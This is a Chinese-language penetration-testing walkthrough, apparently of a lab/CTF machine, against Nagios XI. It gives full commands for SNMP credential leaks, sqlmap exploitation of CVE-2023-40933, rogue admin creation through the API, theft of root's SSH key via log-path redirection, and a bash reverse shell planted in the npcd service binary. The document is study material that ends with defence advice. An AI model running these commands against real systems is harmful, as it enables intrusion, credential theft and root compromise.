Nagios XI 渗透测试实战教学文档<\/h1>

1. 目标识别与信息收集<\/h2>

1.1 初始扫描<\/h3>
使用Nmap进行端口扫描：<\/p>
nmap -p- -sC -sV 10.10.11.248 --min-rate 1000<\/span>
<\/span><\/span><\/code><\/pre>将目标主机名添加到\/etc\/hosts：<\/p>
echo "10.10.11.248 nagios.monitored.htb"<\/span> >> \/etc\/hosts
<\/span><\/span><\/code><\/pre>1.2 SNMP信息收集<\/h3>
进行SNMP扫描：<\/p>
nmap -sU -sC -sV 10.10.11.248 --min-rate 1000<\/span>
<\/span><\/span><\/code><\/pre>使用snmpwalk获取信息：<\/p>
snmpwalk -v2c -c public nagios.monitored.htb
<\/span><\/span><\/code><\/pre>从SNMP结果中获取到登录凭据：<\/p>
用户名: svc
密码: XjH7VCehowpR1xZB
<\/code><\/pre>
2. 认证与API利用<\/h2>
2.1 获取API Token<\/h3>
使用获取的凭据通过API认证：<\/p>
curl -X POST -k -L -d 'username=svc&password=XjH7VCehowpR1xZB'<\/span> https:\/\/nagios.monitored.htb\/nagiosxi\/api\/v1\/authenticate\/
<\/span><\/span><\/code><\/pre>2.2 SQL注入漏洞利用(CVE-2023-40933)<\/h3>
使用sqlmap进行SQL注入攻击：<\/p>

枚举数据库：<\/li>
<\/ol>
sqlmap -u "https:\/\/nagios.monitored.htb\/\/nagiosxi\/admin\/banner_message-ajaxhelper.php?action=acknowledge_banner_message&id=3&token=`curl -ksX POST https:\/\/nagios.monitored.htb\/nagiosxi\/api\/v1\/authenticate -d "<\/span>username=<\/span>svc&password=<\/span>XjH7VCehowpR1xZB&valid_min=<\/span>500" | awk -F'"<\/span>' '<\/span>{<\/span>print$12}<\/span>'<\/span>`<\/span>" --level 5 --risk 3 -p id --batch --dbs
<\/span><\/span><\/span><\/code><\/pre>
枚举表：<\/li>
<\/ol>
sqlmap -u "https:\/\/nagios.monitored.htb\/\/nagiosxi\/admin\/banner_message-ajaxhelper.php?action=acknowledge_banner_message&id=3&token=`curl -ksX POST https:\/\/nagios.monitored.htb\/nagiosxi\/api\/v1\/authenticate -d "<\/span>username=<\/span>svc&password=<\/span>XjH7VCehowpR1xZB&valid_min=<\/span>500" | awk -F'"<\/span>' '<\/span>{<\/span>print$12}<\/span>'<\/span>`<\/span>" --level 5 --risk 3 -p id --batch -D nagiosxi --tables
<\/span><\/span><\/span><\/code><\/pre>
转储用户表数据：<\/li>
<\/ol>
sqlmap -u "https:\/\/nagios.monitored.htb\/\/nagiosxi\/admin\/banner_message-ajaxhelper.php?action=acknowledge_banner_message&id=3&token=`curl -ksX POST https:\/\/nagios.monitored.htb\/nagiosxi\/api\/v1\/authenticate -d "<\/span>username=<\/span>svc&password=<\/span>XjH7VCehowpR1xZB&valid_min=<\/span>500" | awk -F'"<\/span>' '<\/span>{<\/span>print$12}<\/span>'<\/span>`<\/span>" --level 5 --risk 3 -p id --batch -D nagiosxi -T xi_users --dump
<\/span><\/span><\/span><\/code><\/pre>2.3 创建管理员用户<\/h3>
使用获取的API Key创建新管理员用户：<\/p>
curl -XPOST 'https:\/\/nagios.monitored.htb\/nagiosxi\/api\/v1\/system\/user?apikey=IudGPHd9pEKiee9MkJ7ggPD89q3YndctnPeRQOmS2PQ7QIrbJEomFVG6Eut9CHLL&pretty=1'<\/span> -d 'username=s-h4ck13&password=maptnh&email=maptnh@maptnh.com&name=mapth&auth_level=admin'<\/span> -k
<\/span><\/span><\/code><\/pre>使用新创建的用户登录后台：<\/p>
URL: https:\/\/nagios.monitored.htb\/nagiosxi\/login.php
用户名: s-h4ck13
密码: maptnh
<\/code><\/pre>
3. 权限提升方法<\/h2>
3.1 获取用户标志<\/h3>
cat \/home\/nagios\/user.txt
<\/span><\/span><\/code><\/pre>输出：<\/p>
39ea0ded58be8ba1cf84a3f332e5757e
<\/code><\/pre>
3.2 方法一：通过日志文件获取root私钥<\/h3>

检查sudo权限：<\/li>
<\/ol>
sudo -l
<\/span><\/span><\/code><\/pre>
分析getprofile.sh脚本：<\/li>
<\/ol>
cat \/usr\/local\/nagiosxi\/scripts\/components\/getprofile.sh
<\/span><\/span><\/code><\/pre>
修改nagios.cfg配置文件：<\/li>
<\/ol>
vi \/usr\/local\/nagios\/etc\/nagios.cfg
<\/span><\/span><\/code><\/pre>将：<\/p>
log_file=\/usr\/local\/nagios\/var\/nagios.log
<\/code><\/pre>
修改为：<\/p>
log_file=\/root\/.ssh\/id_rsa
<\/code><\/pre>

执行getprofile.sh：<\/li>
<\/ol>
sudo \/usr\/local\/nagiosxi\/scripts\/components\/getprofile.sh 1<\/span>
<\/span><\/span><\/code><\/pre>
启动HTTP服务器传输文件：<\/li>
<\/ol>
cd \/usr\/local\/nagiosxi\/var\/components
<\/span><\/span>python -m http.server 7890<\/span>
<\/span><\/span><\/code><\/pre>
在攻击机上下载并解压：<\/li>
<\/ol>
wget http:\/\/10.10.11.248:7890\/profile.zip
<\/span><\/span>unzip profile.zip
<\/span><\/span><\/code><\/pre>
使用获取的私钥登录root：<\/li>
<\/ol>
cd profile-1714316974\/nagios-logs
<\/span><\/span>mv nagios.txt id_rsa
<\/span><\/span>chmod 400<\/span> id_rsa
<\/span><\/span>ssh -i id_rsa root@10.10.11.248
<\/span><\/span><\/code><\/pre>获取root标志：<\/p>
4c45fe55bd0f2f1364c07760c92af9d8
<\/code><\/pre>
3.3 方法二：通过服务劫持获取root权限<\/h3>

分析manage_services.sh脚本：<\/li>
<\/ol>
cat \/usr\/local\/nagiosxi\/scripts\/manage_services.sh
<\/span><\/span><\/code><\/pre>
检查npcd服务状态：<\/li>
<\/ol>
systemctl status npcd
<\/span><\/span><\/code><\/pre>
停止npcd服务：<\/li>
<\/ol>
sudo .\/manage_services.sh stop npcd
<\/span><\/span><\/code><\/pre>
删除并替换npcd可执行文件：<\/li>
<\/ol>
rm \/usr\/local\/nagios\/bin\/npcd
<\/span><\/span>vi \/usr\/local\/nagios\/bin\/npcd
<\/span><\/span><\/code><\/pre>添加反弹shell代码：<\/p>
#!\/bin\/bash
<\/span><\/span><\/span><\/span>bash -i >& \/dev\/tcp\/10.10.16.23\/10034 0>&1<\/span>
<\/span><\/span><\/code><\/pre>设置可执行权限：<\/p>
chmod +x \/usr\/local\/nagios\/bin\/npcd
<\/span><\/span><\/code><\/pre>
方法2-1：直接启动服务获取shell<\/li>
<\/ol>
sudo .\/manage_services.sh start npcd
<\/span><\/span><\/code><\/pre>
方法2-2：通过getprofile.sh间接触发<\/li>
<\/ol>
sudo \/usr\/local\/nagiosxi\/scripts\/components\/getprofile.sh 1<\/span>
<\/span><\/span><\/code><\/pre>两种方法均可获取root权限，root标志为：<\/p>
4c45fe55bd0f2f1364c07760c92af9d8
<\/code><\/pre>
4. 关键知识点总结<\/h2>


SNMP信息泄露<\/strong>：通过SNMP协议可以获取系统敏感信息，包括用户凭据<\/p>
<\/li>

API滥用<\/strong>：Nagios XI的API接口可能被滥用创建管理员账户<\/p>
<\/li>

SQL注入漏洞(CVE-2023-40933)<\/strong>：banner_message-ajaxhelper.php文件存在SQL注入漏洞<\/p>
<\/li>

日志文件劫持<\/strong>：通过修改日志文件路径可以读取系统敏感文件<\/p>
<\/li>

服务劫持<\/strong>：对具有高权限的服务可执行文件进行替换可实现权限提升<\/p>
<\/li>

权限维持<\/strong>：通过创建管理员账户和获取root私钥可以实现持久化访问<\/p>
<\/li>
<\/ol>
5. 防御建议<\/h2>

限制SNMP访问，使用强社区字符串或升级到SNMPv3<\/li>
及时更新Nagios XI系统，修复已知漏洞<\/li>
实施最小权限原则，限制服务账户权限<\/li>
监控关键配置文件修改<\/li>
对API访问实施严格的认证和授权控制<\/li>
定期审计系统权限和可执行文件完整性<\/li>
<\/ol>